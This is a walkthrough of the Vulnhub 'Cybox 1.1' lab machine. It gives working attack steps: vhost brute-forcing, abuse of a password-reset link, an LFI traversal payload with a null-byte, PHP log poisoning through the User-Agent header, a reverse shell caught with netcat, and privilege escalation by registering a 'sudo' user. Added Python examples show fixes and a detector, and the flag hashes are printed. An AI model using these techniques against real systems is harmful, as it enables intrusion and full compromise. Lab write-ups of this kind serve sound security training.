Vulnhub - Cybox 1.1 write up

Description

Will you be able to compromise the internal server of the CYBOX company?

Difficulty: Medium
Objective: Get user.txt and root.txt

This works better with VirtualBox rather than VMware.
Contact: @takito1812

Recon

Let's scan our network to find the IP of the box.

$ sudo netdiscover

 Currently scanning: 192.168.30.0/16   |   Screen View: Unique Hosts                                                                
                                                                                                                                    
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 264                                                                    
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------                                                             
 192.168.1.40    08:00:27:e2:7c:c9      1      60  PCS Systemtechnik GmbH                                                           
...

Port scan:

$ nmap -p -1024 -T4 -oN scan.nmap 192.168.1.40

PORT    STATE SERVICE
21/tcp  open  ftp
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
143/tcp open  imap
443/tcp open  https

There are many open ports: FTP, mail (SMTP, POP3 and IMAP) and web (HTTP and HTTPS).

FTP

I try an anonymous login on the FTP server, but it doesn't work.

Web

https://192.168.1.40/index.html

Nothing interesting on this static webpage, apart from the admin email, which gives us a valid username and the domain (cybox.company).

The HTTPS certificate confirms the validity of the admin email address.

/C=US/ST=New York/L=New York City/O=Cybox Company/OU=Cybox/CN=cybox.company/emailAddress=admin@cybox.company

Meanwhile, gobuster was running in the background to find new endpoints.

$ /opt/gobuster dir -w /opt/directory-list-lowercase-2.3-medium.txt -x php,txt,html -t 30 --url 192.168.1.40 -q -o gobuster.dir

/index.html           (Status: 200) [Size: 8514]
/assets               (Status: 301) [Size: 237] [--> https://cybox.company/assets/]
/phpmyadmin           (Status: 403) [Size: 92]

/phpmyadmin returns:

For security reasons, this URL is only accesible using localhost (127.0.0.1) as the hostname
https://192.168.1.40/phpmyadmin

I try changing the Host HTTP header, but it does not work.

$ curl -H "Host: localhost" http://192.168.1.40/phpmyadmin
For security reasons, this URL is only accesible using localhost (127.0.0.1) as the hostname

$ curl -H "Host: 127.0.0.1" http://192.168.1.40/phpmyadmin
For security reasons, this URL is only accesible using localhost (127.0.0.1) as the hostname

So I try to brute-force virtual hosts; maybe we can find some new web applications.

$ /opt/gobuster vhost -w /opt/directory-list-lowercase-2.3-medium.txt -t 30 --url http://cybox.company -q -o vhost.dir

Found: register.cybox.company (Status: 200) [Size: 1252]
Found: dev.cybox.company (Status: 200) [Size: 209]      
Found: webmail.cybox.company (Status: 302) [Size: 0]    
Found: monitor.cybox.company (Status: 302) [Size: 0]    
Found: ftp.cybox.company (Status: 200) [Size: 5295] 

Add them to the /etc/hosts file.

$ cat /etc/hosts
192.168.1.40 cybox.company register.cybox.company dev.cybox.company webmail.cybox.company monitor.cybox.company ftp.cybox.company

https://webmail.cybox.company
https://dev.cybox.company/phpinfo.php
https://monitor.cybox.company
https://ftp.cybox.company
https://register.cybox.company

Yes, there are many apps! Let's create a user on the register app.

user: toto

Now we can log in to the webmail and the monitor app. We have no mail and the monitor has no content. Let's try to reset our password.

Let's check our emails.

OK, now what if we change the email in the reset link?

.../updatePasswordRequest.php?email=toto@cybox.company
.../updatePasswordRequest.php?email=admin@cybox.company

Yes! We can reset the admin password on the monitor app! We now have access to a new admin panel.

https://monitor.cybox.company/admin/

After looking at the source code of the page, we can find this:

<link href="styles.php?style=general" type="text/css" rel="stylesheet">

Maybe we can do an LFI (Local File Inclusion) through the style parameter. After some URL guessing, we find a CSS file at /admin/styles/general.css.

After a few quick tries, we can confirm the LFI.

http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../etc/passwd%00

root:x:0:0::/root:/bin/bash
...
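A hardened way to turn the style parameter into a file path, as an added Python example (not the monitor app's own code, which is PHP); the stylesheet directory is assumed from the path guessed above:

```python
import os
from typing import Optional

# Added example (not the monitor app's own code): a safe replacement for the
# way styles.php turned the "style" parameter into a file path. The assumed
# location of the stylesheets is the directory the write-up found by guessing.
STYLES_DIR = "/opt/bitnami/apache2/htdocs/monitor/admin/styles"

def resolve_style(style: str, styles_dir: str = STYLES_DIR) -> Optional[str]:
    """Return the absolute path of <styles_dir>/<style>.css, or None when the
    parameter is anything other than a plain stylesheet name."""
    # A stylesheet name never needs a separator, a NUL byte or a dot, so refuse
    # them outright. This alone stops ../../etc/passwd%00 style payloads.
    if not style or "\x00" in style or "/" in style or "\\" in style:
        return None
    if not all(c.isascii() and (c.isalnum() or c in "-_") for c in style):
        return None
    # Defence in depth: even a name that passed the filter must resolve to a
    # location inside styles_dir once symlinks and ".." are canonicalised.
    root = os.path.realpath(styles_dir)
    candidate = os.path.realpath(os.path.join(root, style + ".css"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

if __name__ == "__main__":
    for param in ("general", "../../../../../../../../etc/passwd\x00"):
        print(repr(param), "->", resolve_style(param))
```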

So now let's try to load log files. After some brute-forcing, we find the Apache access log of the ftp.cybox.company app at /opt/bitnami/apache2/logs/access_log.
By making HTTP requests to the FTP app, we control part of the content of the access_log file, so we can inject PHP code into it.

$ curl "http://ftp.cybox.company/index.php" -A '<?php echo "toto"; ?>'
-A sets the User-Agent header.
Then go to http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../opt/bitnami/apache2/logs/access_log%00

...
192.168.1.30 - - [03/Jan/2021:21:55:55 +0100] "GET /index.php HTTP/1.1" 200 5295 "-" "toto"

The PHP code is executed! When I try to get a reverse shell, the cybox machine can't reach our box, some firewall rules I guess. So I make the reverse shell connect back on port 80 instead, and it works!
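A small log-poisoning detector, added here as an example and not part of the original write-up: it parses constructed Apache combined-format lines and flags both halves of the chain, PHP open tags in the User-Agent or Referer and traversal or NUL bytes in the request target.

```python
import re
from typing import Dict, List, Optional

# Added example, not part of the original write-up: a small detector for the
# poisoning chain above, run over constructed access_log lines. Apache's
# "combined" format escapes quotes inside quoted fields, which is how a
# User-Agent such as <?php echo "toto"; ?> is written to disk.
QUOTED = r'"(?:[^"\\]|\\.)*"'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ (?P<referer>' + QUOTED + r') (?P<ua>' + QUOTED + r')$'
)
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\.(?:/|%2f|\\|%5c)|%00", re.IGNORECASE)

def classify(line: str) -> Optional[Dict[str, object]]:
    """Parse one access_log line and list the indicators it carries."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    findings: List[str] = []
    # PHP open tags in client-controlled headers that httpd copies verbatim.
    if PHP_TAG.search(m["ua"]) or PHP_TAG.search(m["referer"]):
        findings.append("php_tag_in_header")
    # Traversal or NUL truncation in the request target (the LFI half).
    if TRAVERSAL.search(m["target"]):
        findings.append("traversal_in_request")
    return {"ip": m["ip"], "target": m["target"], "findings": findings}

def scan(log_text: str) -> List[Dict[str, object]]:
    """Return only the entries that carry at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        entry = classify(line)
        if entry and entry["findings"]:
            hits.append(entry)
    return hits

# Constructed sample: a normal hit, the poisoned User-Agent, then the LFI read.
SAMPLE_LOG = r'''192.168.1.30 - - [03/Jan/2021:21:55:01 +0100] "GET /index.php HTTP/1.1" 200 5295 "-" "Mozilla/5.0"
192.168.1.30 - - [03/Jan/2021:21:55:55 +0100] "GET /index.php HTTP/1.1" 200 5295 "-" "<?php echo \"toto\"; ?>"
192.168.1.30 - - [03/Jan/2021:21:56:10 +0100] "GET /admin/styles.php?style=../../../../../../../../opt/bitnami/apache2/logs/access_log%00 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
'''

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["target"], ", ".join(hit["findings"]))
```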

$ nc -lvnp 80
Connection from 192.168.1.32:41542
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
python: /opt/bitnami/common/lib/libz.so.1: no version information available (required by python)
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

User

We have our first shell! Let's find the user.txt flag!

daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd
bash: cd: HOME not set
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd /home
daemon@cybox:/home$ ls
admin  cybox  toto
daemon@cybox:/home$ cd cybox
daemon@cybox:/home/cybox$ ls 
user.txt
daemon@cybox:/home/cybox$ cat user.txt
d85da08f1a31ef96fb6d4f608611bca2

Root

We can switch to the user toto:toto that we previously created on the register app (it's not required to root the box).

After some enumeration, we find a weird SUID binary at /opt/registerlauncher. It's an ELF that creates the different users on the box from the register app (like our user toto). It takes one parameter: the name of the user to create.

I try to find known vulnerabilities associated with the ELF, but without result.

So I ask myself: what user could we create to gain privileges? Remember from the beginning: I created a user toto and its password was toto too. So I try to run the binary with root as parameter; maybe this will reset the root password to root. But I get "user already exists". RIP

After some research, my friend W00dy found that if you create a user named sudo, you can execute any command with sudo by providing the password sudo.

toto@cybox:/tmp$ /opt/registerlauncher sudo
sudo@cybox.company has been created successfully. The credentials are sudo:sudo. You should change your default password for security.
toto@cybox:/tmp$ su sudo
Password: sudo

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

sudo@cybox:/tmp$ sudo -l
[sudo] password for sudo: sudo

Matching Defaults entries for sudo on cybox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sudo may run the following commands on cybox:
    (ALL : ALL) ALL
sudo@cybox:/tmp$ sudo su
root@cybox:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

We are root!

root@cybox:/tmp# cat /etc/sudoers    
...
# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL
...
root@cybox:/tmp# cat /root/root.txt
4c0183fdd736e2b8fb3f57ddbfa8ce36

The user sudo matches the %sudo entry of the /etc/sudoers file.
Root flag!
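The check registerlauncher was missing, as an added Python example (not the binary's own code): a registration name must not collide with an existing user or group, nor with a principal named in sudoers; the passwd, group and sudoers excerpts below are constructed.

```python
import re
from typing import Optional, Set

# Added example, not the registerlauncher binary's own logic: a self-registered
# name must not collide with any existing user OR group, nor with a principal in
# sudoers, otherwise a new "sudo" account lands under the %sudo rule seen above.
# The three files below are constructed excerpts, not copied from the box.
PASSWD = """root:x:0:0::/root:/bin/bash
cybox:x:1000:1000::/home/cybox:/bin/bash
"""
GROUP = """root:x:0:
sudo:x:27:
admin:x:115:
cybox:x:1000:
"""
SUDOERS = """Defaults env_reset, mail_badpass
# Allow members of group sudo to execute any command
%sudo\tALL=(ALL:ALL) ALL
root\tALL=(ALL:ALL) ALL
"""
# Lower-case portable names only; no dots, slashes or shell metacharacters.
NAME_RE = re.compile(r"^[a-z][a-z0-9_-]{0,31}$")

def names_in(db: str) -> Set[str]:
    """First field of every non-comment line of a passwd/group style file."""
    return {ln.split(":")[0] for ln in db.splitlines() if ln and not ln.startswith("#")}

def sudoers_principals(sudoers: str) -> Set[str]:
    """Users and groups (%group, stripped of the %) that sudoers grants rules to."""
    out: Set[str] = set()
    for ln in sudoers.splitlines():
        ln = ln.strip()
        if not ln or ln.startswith(("#", "Defaults")):
            continue
        out.add(ln.split()[0].lstrip("%"))
    return out

def validate_username(name: str, passwd: str = PASSWD, group: str = GROUP,
                      sudoers: str = SUDOERS) -> Optional[str]:
    """Return None if the name may become a new account, else the refusal reason."""
    if not NAME_RE.match(name):
        return "invalid username"
    if name in names_in(passwd):
        return "user already exists"
    if name in names_in(group):
        return "name collides with an existing group"
    if name in sudoers_principals(sudoers):
        return "name is a sudoers principal"
    return None
```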
